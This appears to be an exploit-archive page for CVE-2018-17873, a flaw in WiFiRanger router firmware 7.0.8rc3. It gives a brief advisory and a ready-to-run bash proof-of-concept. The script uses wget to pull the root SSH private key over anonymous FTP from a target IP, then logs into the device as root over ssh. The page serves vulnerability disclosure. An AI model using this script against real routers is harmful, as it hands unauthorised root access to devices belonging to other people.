WiFiRanger 7.0.8rc3 Incorrect Access Control / Privilege Escalation

WiFiRanger version 7.0.8rc3 suffers from an incorrect access control that allows for ftp retrieval of an RSA identity that an attacker can use to ssh in as root.


MD5 | 301d05eb6ae49dff97112c3a73c88308

# Exploit Title: WiFiRanger 7.0.8rc3 Incorrect Access Control - Privilege Escalation (POC)
# Exploit Author: Mitchel Jordan
# Date: 2018-10-18
# Vendor Homepage: https://wifiranger.com/
# Firmware: Phantom 7.0.8rc3
# CVE: CVE-2018-17873

# Details:
# WiFiRanger indoor routers (Core, GoAC) and their outdoor paired routers (Sky Pro, EliteAC, EliteAC FM) running
# firmware version 7.0.8rc3 and earlier allow anonymous FTP read/write access and have left the SSH Private Key
# in the clear - making it a trivial task to view/copy the key and log in with root privileges.
#
# Adjacent network access required to exploit this vulnerability.

# Exploit:
# Extremely simple shell script that grabs the private key and logs in as root.
#
# Usage: ./wifiRangerPwn.sh <WiFiRanger IP>

#!/bin/bash

wget "ftp://$1/sbc/aff/id_rsa"
chmod 600 id_rsa
ssh -i id_rsa [email protected]$1

Related Posts